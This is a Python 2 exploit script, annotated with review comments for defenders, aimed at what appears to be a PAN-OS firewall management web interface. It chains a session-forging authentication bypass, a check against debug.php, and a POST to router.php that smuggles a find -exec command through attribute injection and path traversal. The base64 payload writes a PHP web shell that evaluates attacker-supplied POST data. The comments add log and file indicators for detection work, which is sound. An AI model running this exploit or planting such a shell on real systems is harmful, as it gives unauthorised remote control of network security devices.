- import urllib
- import urllib2
- import ssl
- import sys
- # Review annotations, written for defenders reading this listing.
- # The script is Python 2 (print statements, urllib2). The paste lost its
- # indentation: the lines following each `if` were presumably indented.
- # It sends three HTTPS requests to the management web interface at `domain`:
- #   1. a GET with a crafted `device` parameter, to obtain a session cookie,
- #   2. a GET to debug.php, to check that the cookie is accepted as logged in,
- #   3. a POST to router.php carrying an injected command in its JSON body.
- # NOTE(review): "PanDirect" and the /opt/pancfg path suggest a PAN-OS
- # management interface. The page names no advisory or affected version, so
- # identify the matching vendor advisory and fixed release before triage.
- # Exposure depends on who can reach the management interface; keeping it on
- # a dedicated management network limits who can send these requests.
- #
- # Replaces the default HTTPS context with an unverified one, so certificate
- # validation is off for every urllib2 HTTPS request made by this process.
- ssl._create_default_https_context = ssl._create_unverified_context
- # Hard-coded private (RFC 1918) address used as the target host.
- domain = "192.168.1.1"
- #pass auth
- print "step 1: pass_auth"
- # The `device` value ends with quote characters followed by `;user|s:`.
- # NOTE(review): `name|s:` resembles PHP's session serialization format, so
- # this looks like an attempt to plant a `user` entry in the stored session.
- # That is inferred from the string, not shown by the code.
- # Detection: web-server log entries for /esp/cms_changeDeviceContext.esp whose
- # `device` parameter contains quotes, `;` or `|`.
- pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
- print "pass_auth request: " + pass_auth_url
- request = urllib2.Request(pass_auth_url)
- response = urllib2.urlopen(request)
- print "pass_auth respone: " + response.read()
- # Locate the PHPSESSID cookie inside the Set-Cookie response header.
- session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
- if session_start_index == -1:
- print "pass_auth fail!!"
- sys.exit()
- # Keep only the text from "PHPSESSID" up to the next ';'.
- session = response.headers['Set-Cookie'][session_start_index:]
- session = session[:session.find(';')]
- # The same cookie is replayed on both later requests.
- auth_headers = {
- 'Cookie':session,
- 'Connection':'keep-alive'
- }
- print "\n"
- print "step 2: check if pass auth"
- # Requests /php/utils/debug.php with the cookie from step 1. A body containing
- # "Debug" is taken as proof that the session is treated as authenticated.
- # Detection: debug.php served to a session that has no preceding login event.
- auth_url = "https://" + domain + "/php/utils/debug.php"
- print "auth_url request: " + auth_url
- request = urllib2.Request(auth_url, headers = auth_headers)
- response = urllib2.urlopen(request)
- content = response.read()
- #print content
- if "Debug" not in content:
- print "pass auth fail!!"
- sys.exit()
- print "pass auth success!!"
- print "\n"
- print "setp 3: create dir"
- # POST of a JSON RPC body ("action":"PanDirect", "Administrator.get").
- # The `id` field closes a quoted value and appends `async-mode`, `refresh` and
- # `cookie` attributes, then `/>` and a NUL escape. NOTE(review): this looks
- # like attribute injection into an XML request built by the backend (inferred).
- # The `cookie` value uses ../ traversal to reach a name under
- # /opt/pancfg/mgmt/logdb/traffic/1/ that embeds `* -print -exec python -c ...`.
- # NOTE(review): `-print -exec` are find(1) arguments, and the closing message
- # says "15 minutes later", so a periodic job presumably expands that name
- # into a find command line. The listing itself does not show that job.
- # The base64 blob decodes to Python that writes a one-line PHP file, which
- # evaluates a POST parameter, to /var/appweb/htdocs/poc.php.
- # Indicators: entries under /opt/pancfg/mgmt/logdb/traffic/1/ whose names
- # contain spaces or `-exec`; unexpected .php files under /var/appweb/htdocs;
- # POSTs to router.php/Administrator.get whose body contains `cookie='../`.
- create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
- print "create_dir request: " + create_dir_url
- post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2FzaGVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
- request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)
- # The response to this POST is never read or checked.
- response = urllib2.urlopen(request)
- print "\n"
- # The printed file name (vudrc.php) differs from the one the decoded payload
- # writes (poc.php). When hunting, review every unexpected .php file in the
- # web root rather than searching for a single name.
- print "15 minutes later, visit https://" + domain + "/vudrc.php"